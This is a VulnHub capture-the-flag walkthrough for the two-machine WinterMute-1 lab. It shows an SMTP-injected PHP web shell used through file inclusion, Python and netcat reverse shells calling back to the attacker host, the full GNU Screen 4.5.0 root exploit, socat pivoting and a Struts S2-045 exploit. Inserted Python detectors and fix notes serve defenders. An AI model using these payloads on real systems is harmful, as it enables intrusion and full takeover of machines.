VulnHub machine walkthrough [WinterMute-1]

Name

Name: WinterMute:1
Release date: 5 July 2018

Download

  • Download: https://drive.google.com/open?id=1bHgdx0iI24jv7MDzKcrIPtd9rVFaVokR
  • Download (Mirror): https://download.vulnhub.com/wintermute/Wintermute-v1.zip
  • Download (Torrent): https://download.vulnhub.com/wintermute/Wintermute-v1.zip.torrent

Description

A new OSCP-style lab involving 2 vulnerable machines, themed after the cyberpunk classic Neuromancer, required reading for any infosec enthusiast. The lab makes use of pivoting and post-exploitation, which I found other OSCP prep labs seem to lack. The goal is to get root on both machines. You only need a default Kali Linux.

I'd rate it "intermediate". There is no buffer overflow or exploit development; a small wordlist will do for any password cracking that's needed. It's more in line with OSCP boxes than with CTFs. I've tested it a lot, but if you find any issues or need a nudge, reach me here.

The zip download includes setup instructions for the VirtualBox lab, but here's a brief summary: Straylight simulates a public-facing server with 2 NICs. Root this box first, then move on to the last machine. Neuromancer sits on a non-public network with 1 NIC. Your Kali box should only be on the same virtual network as Straylight. VirtualBox is required; VMware won't import it properly.

Network configuration

Wintermute VirtualBox setup guide. This exercise makes use of pivoting, so the VirtualBox networking needs to be set up correctly. All dynamic IPs, quick and easy. Run or import each machine into VirtualBox (File >> Import Appliance).

STRAYLIGHT (networks #1 and #2) - this is the first machine to get root on.

  • Adapter 1
    • Host-only Adapter
    • VirtualBox Host-Only Ethernet Adapter #1
      Advanced (we want 2 NIC’s, each on a separate network)
    • Adapter Type - Intel PRO/1000 T Server
  • Adapter 2
    • Host-only Adapter
    • VirtualBox Host-Only Ethernet Adapter #2
      Advanced
    • Adapter Type - Intel PRO/1000 MT Desktop (or other adapter type different than network #1).

NEUROMANCER (network #2) - this is the final machine to get root on. Set up with 1 network. Only reachable through Straylight, via Host-only Ethernet Adapter #2.

  • Adapter 1
    • Host-only Adapter
    • VirtualBox Host-Only Ethernet Adapter #2
      Advanced
    • Adapter Type - Intel PRO/1000 MT Desktop

KALI (network #1) - your attack machine should only be set up on the Host-only adapter that Straylight is on, plus NAT if you choose. You should not be able to ping Neuromancer from the Kali box. If you can, you're cheating.

  • Adapter 1
    • Host-only Adapter
    • VirtualBox Host-Only Ethernet Adapter #1

The network is set up this way so that you root STRAYLIGHT first and then move on to NEUROMANCER.

Wintermute-Straylight

Information gathering

Fire up nmap

root@kali:~# nmap -sn -v 192.168.56.0/24
Nmap scan report for 192.168.56.111
Host is up (0.00011s latency).
MAC Address: 08:00:27:50:96:D9 (Oracle VirtualBox virtual NIC)
root@kali:~# nmap -p- -sV -Pn -T5 -v -A --script=vuln 192.168.56.111
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params:
| VULNERABLE:
| Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
| State: VULNERABLE
| Transport Layer Security (TLS) services that use anonymous
| Diffie-Hellman key exchange only provide protection against passive
| eavesdropping, and are vulnerable to active man-in-the-middle attacks
| which could completely compromise the confidentiality and integrity
| of any data exchanged over the resulting session.
| Check results:
| ANONYMOUS DH GROUP 1
| Cipher Suite: TLS_DH_anon_WITH_AES_256_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 2048
| Generator Length: 8
| Public Key Length: 2048
| References:
|_ https://www.ietf.org/rfc/rfc2246.txt
|_sslv2-drown:
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /manual/: Potentially interesting folder
|_http-server-header: Apache/2.4.25 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3000/tcp open http Mongoose httpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.111
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.56.111:3000/
| Form id:
|_ Form action: /authorize.html
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
|_http-passwd: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trane-info: Problem with XML parsing of /evox/about
| http-vuln-cve2010-0738:
|_ /jmx-console/: Authentication was not required

Visit port 80

Visit port 3000

At the bottom of the page there is a hint that both the username and the password are admin, so just log in.

Hint: the default user and password are admin

Some directories are found

Then visit http://192.168.56.111/turing-bolo/

After clicking, the following is shown

In the screenshot above, several log files can be seen (highlighted). From experience, if this parameter is vulnerable to directory traversal, a file we can write to can be included and executed by PHP. So try appending ../../../log/mail to the URL in the browser, as follows:

http://192.168.56.111//turing-bolo/bolo.php?bolo=../../../log/mail

The following URL also works

http://192.168.56.111//turing-bolo/bolo.php?bolo=/var/log/mail

getshell

It works. Now let's try sending a malicious email via telnet, putting some PHP code in the mail subject.

root@kali:~# telnet 192.168.56.111 25
Trying 192.168.56.111...
Connected to 192.168.56.111.
Escape character is '^]'.
220 straylight ESMTP Postfix (Debian/GNU)
HELO hack.com
250 straylight
MAIL FROM: hacker@hack.com
250 2.1.0 Ok
RCPT TO: wintermute@localhost.com
454 4.7.1 <wintermute@localhost.com>: Relay access denied
RCPT TO: wintermute
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
subject: <?php system($_REQUEST['luci']); ?>
hacked!!
.
250 2.0.0 Ok: queued as EC8E454D7
quit
221 2.0.0 Bye
Connection closed by foreign host.

Now include the mail log again, but this time send a second GET parameter, luci, which carries the command to execute.

http://192.168.56.111//turing-bolo/bolo.php?bolo=/var/log/mail&luci=id

The command executes, so now build the following PoC to get a reverse shell

http://192.168.56.111/turing-bolo/bolo.php?bolo=/var/log/mail&luci=python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.56.102',9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

The shell comes back to Kali

root@kali:~# nc -lvp 9999
listening on [any] 9999 ...
192.168.56.109: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.109] 48508
bash: cannot set terminal process group (771): Inappropriate ioctl for device
bash: no job control in this shell
www-data@straylight:/var/www/html/turing-bolo$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@straylight:/var/www/html/turing-bolo$ whoami
whoami
www-data
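Seen from the defender's side, the chain above (a traversal into /var/log/mail, a PHP tag planted through an SMTP Subject header, then a second parameter carrying the command) leaves two traces: request parameters that point outside the web root, and log entries that contain a PHP open tag. The script below is an added example written for this page, not code from the write-up or the box. The access-log and mail-log lines are constructed to mirror the requests and the mail shown above; the parameter names bolo and luci and the file names come from the page.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache access-log lines mirroring the requests made above
# (not captured from the real Straylight host).
ACCESS_LOG = """\
192.168.56.102 - - [15/Jan/2020:01:20:01 +0000] "GET /turing-bolo/bolo.php?bolo=molly HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.56.102 - - [15/Jan/2020:01:21:13 +0000] "GET /turing-bolo/bolo.php?bolo=../../../log/mail HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
192.168.56.102 - - [15/Jan/2020:01:22:40 +0000] "GET /turing-bolo/bolo.php?bolo=/var/log/mail&luci=id HTTP/1.1" 200 8900 "-" "Mozilla/5.0"
192.168.56.102 - - [15/Jan/2020:01:23:02 +0000] "GET /turing-bolo/bolo.php?bolo=%2Fvar%2Flog%2Fmail&luci=python%20-c%20%22import%20os%22 HTTP/1.1" 200 8900 "-" "curl/7.64.0"
"""

# Constructed Postfix log lines; the Subject header carries the PHP tag that
# was sent over SMTP above.
MAIL_LOG = """\
Jan 15 01:19:55 straylight postfix/smtpd[1211]: connect from unknown[192.168.56.102]
Jan 15 01:20:30 straylight postfix/cleanup[1214]: EC8E454D7: message-id=<20200115012030.EC8E454D7@straylight>
Jan 15 01:20:30 straylight postfix/cleanup[1214]: EC8E454D7: warning: header subject: <?php system($_REQUEST['luci']); ?> from unknown[192.168.56.102]; from=<hacker@hack.com> to=<wintermute@straylight>
Jan 15 01:20:31 straylight postfix/qmgr[1102]: EC8E454D7: from=<hacker@hack.com>, size=300, nrcpt=1 (queue active)
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# "../" anywhere, or an absolute path into directories that hold logs/config.
TRAVERSAL_RE = re.compile(r"\.\./|^/(?:var|etc|proc)/")
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)


def suspicious_params(target):
    """(name, decoded value) for query parameters whose value looks like a path
    traversal or an absolute path into sensitive directories."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; this catches %25-double-encoding
        if TRAVERSAL_RE.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_access_log(text):
    """One finding per request with an LFI-style parameter. Any other parameter
    on the same request is reported as a possible command channel, because a
    planted <?php system($_REQUEST[...]) ?> needs some parameter to read."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        hits = suspicious_params(target)
        if not hits:
            continue
        flagged = {name for name, _ in hits}
        all_names = {n for n, _ in parse_qsl(urlsplit(target).query, keep_blank_values=True)}
        findings.append({"path": urlsplit(target).path,
                         "lfi": hits,
                         "extra_params": sorted(all_names - flagged)})
    return findings


def scan_mail_log(text):
    """Log lines carrying a PHP open tag: code planted for a later include."""
    return [line for line in text.splitlines() if PHP_TAG_RE.search(line)]


if __name__ == "__main__":
    for f in scan_access_log(ACCESS_LOG):
        print(f"LFI attempt on {f['path']}: {f['lfi']} extra params: {f['extra_params']}")
    for line in scan_mail_log(MAIL_LOG):
        print("PHP tag in mail log:", line)
```

The root cause on Straylight is that bolo.php hands the bolo parameter to an include; the fix is to map the parameter to a fixed set of log names on the server side instead of using it as a path. The detector treats any second parameter on a traversal request as the likely command channel, which is exactly what luci is here.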

Privilege escalation

Check for SUID files that could be used to escalate privileges

www-data@straylight:/var/www/html/turing-bolo$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/bin/su
/bin/umount
/bin/mount
/bin/screen-4.5.0
/bin/ping
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign

Running searchsploit on screen-4.5.0 returns a privilege escalation exploit. Perfect!

root@kali:~# searchsploit screen 4.5
-------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------- ----------------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation | exploits/linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (PoC) | exploits/linux/local/41152.txt
-------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Let's look at the exploit's source

root@kali:~# cat /usr/share/exploitdb/exploits/linux/local/41154.sh
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

Run the following sed command to strip the Windows-style carriage returns from the script's line endings; otherwise it won't run properly

root@kali:~/41154# sed -i -e 's/\r$//' 41154.sh
root@kali:~/41154# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

Upgrade to a proper TTY shell

python -c "import pty;pty.spawn('/bin/bash')"

The script runs as shown below and privilege escalation succeeds. Awesome...

www-data@straylight:/var/www/html/turing-bolo$ wget http://192.168.56.102:8000/41154.sh
<ring-bolo$ wget http://192.168.56.102:8000/41154.sh
--2020-01-15 01:30:12-- http://192.168.56.102:8000/41154.sh
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1151 (1.1K) [text/x-sh]
Saving to: '41154.sh'

41154.sh 100%[===================>] 1.12K --.-KB/s in 0s

2020-01-15 01:30:12 (415 MB/s) - '41154.sh' saved [1151/1151]

www-data@straylight:/var/www/html/turing-bolo$ chmod 777 *
chmod 777 *
www-data@straylight:/var/www/html/turing-bolo$ ls
ls
41154.sh bolo.css c7.png css molly.log ta.png
armitage.log bolo.php case.log index.html riviera.log
www-data@straylight:/var/www/html/turing-bolo$ ./41154.sh
./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
/tmp/libhax.c: In function 'dropshell':
/tmp/libhax.c:7:5: warning: implicit declaration of function 'chmod' [-Wimplicit-function-declaration]
chmod("/tmp/rootshell", 04755);
^~~~~
/tmp/rootshell.c: In function 'main':
/tmp/rootshell.c:3:5: warning: implicit declaration of function 'setuid' [-Wimplicit-function-declaration]
setuid(0);
^~~~~~
/tmp/rootshell.c:4:5: warning: implicit declaration of function 'setgid' [-Wimplicit-function-declaration]
setgid(0);
^~~~~~
/tmp/rootshell.c:5:5: warning: implicit declaration of function 'seteuid' [-Wimplicit-function-declaration]
seteuid(0);
^~~~~~~
/tmp/rootshell.c:6:5: warning: implicit declaration of function 'setegid' [-Wimplicit-function-declaration]
setegid(0);
^~~~~~~
/tmp/rootshell.c:7:5: warning: implicit declaration of function 'execvp' [-Wimplicit-function-declaration]
execvp("/bin/sh", NULL, NULL);
^~~~~~
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# whoami
whoami
root
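From the defender's side this escalation leaves two artefacts: a setuid binary that a stock Debian install does not ship (/bin/screen-4.5.0, a hand-built copy outside package management), and a write to /etc/ld.so.preload, a file that normally does not exist and whose entries are loaded into every dynamically linked process. The script below is an added example written for this page (mine, not the author's or the exploit's): it diffs a SUID listing against a baseline and classifies the entries of an ld.so.preload file. The baseline set is an assumption made for the example; build the real one from a clean reference image. The SUID listing is the one shown above.

```python
import os

# Assumed baseline of setuid binaries for a stock Debian 9 install (example
# data, not a vetted list; generate yours from a clean reference image).
EXPECTED_SUID = {
    "/bin/su", "/bin/umount", "/bin/mount", "/bin/ping",
    "/usr/bin/gpasswd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/passwd",
    "/usr/bin/newgrp", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/openssh/ssh-keysign",
}

# Output of `find / -perm -4000` on Straylight, as listed in the write-up above.
STRAYLIGHT_SUID = """
/bin/su
/bin/umount
/bin/mount
/bin/screen-4.5.0
/bin/ping
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
"""

# Directories any local user can write to; a preloaded library living here
# is a strong sign of tampering.
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def unexpected_suid(listing, baseline=EXPECTED_SUID):
    """Return setuid paths in `listing` (one path per line) that are not in the
    baseline, sorted. A versioned name such as screen-4.5.0 usually means a
    hand-built binary that package management does not track or patch."""
    found = {line.strip() for line in listing.splitlines() if line.strip()}
    return sorted(found - baseline)


def preload_findings(preload_text):
    """Classify each entry of an ld.so.preload file. The exploit above writes a
    newline plus /tmp/libhax.so into it and the library's constructor then
    deletes the file, so the window is short: this belongs in a file-integrity
    monitor that fires on creation, not only in a periodic scan."""
    findings = []
    for raw in preload_text.splitlines():
        entry = raw.strip()
        if not entry or entry.startswith("#"):
            continue
        if entry.startswith(UNTRUSTED_DIRS):
            findings.append((entry, "library in user-writable directory"))
        elif not os.path.isabs(entry):
            findings.append((entry, "relative path"))
        elif not os.path.exists(entry):
            findings.append((entry, "library does not exist"))
        else:
            findings.append((entry, "review: a preload is rarely legitimate"))
    return findings


def check_live_preload(path="/etc/ld.so.preload"):
    """Read the real file if present; absence is the normal, healthy state."""
    if not os.path.exists(path):
        return []
    with open(path, encoding="utf-8", errors="replace") as fh:
        return preload_findings(fh.read())


if __name__ == "__main__":
    for p in unexpected_suid(STRAYLIGHT_SUID):
        print("unexpected setuid binary:", p)
    for entry, why in check_live_preload():
        print(f"ld.so.preload: {entry}: {why}")
```

The remediation for the first finding is to drop the setuid bit from the hand-built screen or replace it with the distribution package, which is not setuid root. The dynamic loader's warning visible in the output above ("from /etc/ld.so.preload cannot be preloaded") is another cheap signal worth collecting from system logs.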

Read the flag

# cd /root
cd /root
# ls
ls
flag.txt note.txt scripts
# cat note.txt
cat note.txt
Devs,

Lady 3Jane has asked us to create a custom java app on Neuromancer's primary server to help her interact w/ the AI via a web-based GUI.

The engineering team couldn't strss enough how risky that is, opening up a Super AI to remote access on the Freeside network. It is within out internal admin network, but still, it should be off the network completely. For the sake of humanity, user access should only be allowed via the physical console...who knows what this thing can do.

Anyways, we've deployed the war file on tomcat as ordered - located here:

/struts2_2.3.15.1-showcase

It's ready for the devs to customize to her liking...I'm stating the obvious, but make sure to secure this thing.

Regards,

Bob Laugh
Turing Systems Engineer II
Freeside//Straylight//Ops5
# cat flag.txt
cat flag.txt
5ed185fd75a8d6a7056c96a436c6d8aa

That's the end of WinterMute part one

  • Summary:
    1. Weak credentials
    2. File inclusion
    3. Writing a shell by sending a malicious mail over telnet
    4. Python reverse shell
    5. Screen 4.5.0 local privilege escalation
    6. Using sed -i -e 's/\r$//' to fix the exploit's line endings so it runs

Wintermute-Neuromancer

The note.txt from earlier points at a likely web directory, but that's no use without knowing which ports on Neuromancer are open. Looking at Straylight's ARP table tells us Neuromancer's address: 192.168.56.110.

# arp -a
arp -a
? (192.168.56.102) at 00:0c:29:70:75:41 [ether] on enp0s8
? (192.168.56.110) at 08:00:27:de:b9:3d [ether] on enp0s8
? (192.168.56.1) at 0a:00:27:00:00:19 [ether] on enp0s8
? (192.168.56.100) at 08:00:27:25:3d:8a [ether] on enp0s8
# ifconfig
ifconfig
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.111 netmask 255.255.255.0 broadcast 192.168.56.255
inet6 fe80::a00:27ff:fe50:96d9 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:50:96:d9 txqueuelen 1000 (Ethernet)
RX packets 771 bytes 65226 (63.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 21 bytes 2052 (2.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

enp0s8: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.109 netmask 255.255.255.0 broadcast 192.168.56.255
inet6 fe80::a00:27ff:fea9:7af0 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:a9:7a:f0 txqueuelen 1000 (Ethernet)
RX packets 197671 bytes 11899335 (11.3 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 197077 bytes 14611455 (13.9 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1 (Local Loopback)
RX packets 415522 bytes 33365253 (31.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 415522 bytes 33365253 (31.8 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

You can also write a script to find live hosts

#!/bin/bash
# Ping sweep of 192.168.56.0/24: one probe per host, run in parallel,
# printing only the addresses that answered.
for ip in $(seq 1 254); do
    ping -c 1 -W 1 192.168.56.$ip | grep "bytes from" | cut -d " " -f 4 | cut -d ":" -f 1 &
done
wait   # let the background pings finish before the script exits
# ./pingsweep.sh
./pingsweep.sh
192.168.56.100
192.168.56.102
192.168.56.111
192.168.56.110
192.168.56.109

192.168.56.102 is Kali's IP; 192.168.56.109 and 192.168.56.111 are both Straylight's IPs; 192.168.56.100 is the gateway address of the VirtualBox Host-only Adapter; the remaining one, 192.168.56.110, is Neuromancer's IP address.

Port scan with nc

# for i in $(seq 1 65535); do nc -nvz -w 1 192.168.56.110 $i 2>&1; done | grep -v "Connection refused"
for i in $(seq 1 65535); do nc -nvz -w 1 192.168.56.110 $i 2>&1; done | grep -v "Connection refused"
(UNKNOWN) [192.168.56.110] 8009 (?) open
(UNKNOWN) [192.168.56.110] 8080 (http-alt) open
(UNKNOWN) [192.168.56.110] 34483 (?) open

There are three open ports, 8009, 8080 and 34483, but if you try to browse to the IP and port you see nothing. To reach them, port forwarding is needed. A tool like socat can do this, e.g. socat TCP-LISTEN:5000,fork,reuseaddr tcp:127.0.0.1:8080, which means the site on 8080 becomes visible externally on port 5000. Since three ports need handling, append & to each command; & on *nix tells the system to run the command in the background. In short, run the following commands.

# socat TCP-LISTEN:8009,fork,reuseaddr tcp:192.168.56.110:8009 &
socat TCP-LISTEN:8009,fork,reuseaddr tcp:192.168.56.110:8009 &
# socat TCP-LISTEN:8000,fork,reuseaddr tcp:192.168.56.110:8080 &
socat TCP-LISTEN:8000,fork,reuseaddr tcp:192.168.56.110:8080 &
# socat TCP-LISTEN:34483,fork,reuseaddr tcp:192.168.56.110:34483 &
socat TCP-LISTEN:34483,fork,reuseaddr tcp:192.168.56.110:34483 &

Then run nmap

root@kali:~# nmap -sV -v -p 8009,8080,34483 -Pn -A --script=vuln 192.168.56.110
PORT STATE SERVICE VERSION
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
8080/tcp open http Apache Tomcat 9.0.0.M26
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /examples/: Sample scripts
| /manager/html/upload: Apache Tomcat (401 )
| /manager/html: Apache Tomcat (401 )
|_ /docs/: Potentially interesting folder
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
34483/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Then visit the URL mentioned earlier in note.txt

http://192.168.56.110:8080/struts2_2.3.15.1-showcase/showcase.action

Apache Struts has a number of known exploits. Searching searchsploit for "apache struts" shows plenty of candidates.

root@kali:~# searchsploit apache struts
------------------------------------------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------ ----------------------------------------
Apache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit) | exploits/multiple/remote/24874.rb
Apache Struts - ClassLoader Manipulation Remote Code Execution (Metasploit) | exploits/multiple/remote/33142.rb
Apache Struts - Developer Mode OGNL Execution (Metasploit) | exploits/java/remote/31434.rb
Apache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit) | exploits/linux/remote/39756.rb
Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities | exploits/multiple/webapps/18452.txt
Apache Struts - OGNL Expression Injection | exploits/multiple/remote/38549.txt
Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution | exploits/multiple/remote/43382.py
Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution (Metasploit) | exploits/multiple/remote/39919.rb
Apache Struts - includeParams Remote Code Execution (Metasploit) | exploits/multiple/remote/25980.rb
Apache Struts 1.2.7 - Error Response Cross-Site Scripting | exploits/multiple/remote/26542.txt
Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit) | exploits/multiple/remote/27135.rb
Apache Struts 2 - Namespace Redirect OGNL Injection (Metasploit) | exploits/multiple/remote/45367.rb
Apache Struts 2 - Skill Name Remote Code Execution | exploits/multiple/remote/37647.txt
Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit) | exploits/multiple/remote/44643.rb
Apache Struts 2 < 2.3.1 - Multiple Vulnerabilities | exploits/multiple/webapps/18329.txt
Apache Struts 2.0 - 'XSLTResult.java' Arbitrary File Upload | exploits/java/webapps/37009.xml
Apache Struts 2.0.0 < 2.2.1.1 - XWork 's:submit' HTML Tag Cross-Site Scripting | exploits/multiple/remote/35735.txt
Apache Struts 2.0.1 < 2.3.33 / 2.5 < 2.5.10 - Arbitrary Code Execution | exploits/multiple/remote/44556.py
Apache Struts 2.0.9/2.1.8 - Session Tampering Security Bypass | exploits/multiple/remote/36426.txt
Apache Struts 2.2.1.1 - Remote Command Execution (Metasploit) | exploits/multiple/remote/18984.rb
Apache Struts 2.2.3 - Multiple Open Redirections | exploits/multiple/remote/38666.txt
Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1) | exploits/linux/remote/45260.py
Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2) | exploits/multiple/remote/45262.py
Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasp | exploits/multiple/remote/41614.rb
Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution | exploits/linux/webapps/41570.py
Apache Struts 2.3.x Showcase - Remote Code Execution | exploits/multiple/webapps/42324.py
Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution | exploits/linux/remote/42627.py
Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploi | exploits/multiple/remote/41690.rb
Apache Struts < 2.2.0 - Remote Command Execution (Metasploit) | exploits/multiple/remote/17691.rb
Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection | exploits/multiple/webapps/44583.txt
------------------------------------------------------------------------------------------------ ----------------------------------------

Clone the struts-pwn project from GitHub

root@kali:~/struts-pwn# python3 struts-pwn.py -u http://192.168.56.110:8080/struts2_2.3.15.1-showcase/showcase.action --check

[*] URL: http://192.168.56.110:8080/struts2_2.3.15.1-showcase/showcase.action
[*] Status: Vulnerable!
[%] Done.

This indicates CVE-2017-5638, the Apache Struts2 S2-045 vulnerability

getshell

Then run the following command to get a reverse shell

root@kali:~/struts-pwn# python3 struts-pwn.py -u http://192.168.56.110:8080/struts2_2.3.15.1-showcase/showcase.action -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f"

[*] URL: http://192.168.56.110:8080/struts2_2.3.15.1-showcase/showcase.action
[*] CMD: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f
EXCEPTION::::--> HTTPConnectionPool(host='192.168.56.110', port=8080): Read timed out. (read timeout=3)
ERROR
[%] Done.

The nc command used to get an interactive shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f

The shell comes back

root@kali:~# nc -lvp 9999
listening on [any] 9999 ...
192.168.56.110: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.110] 55378
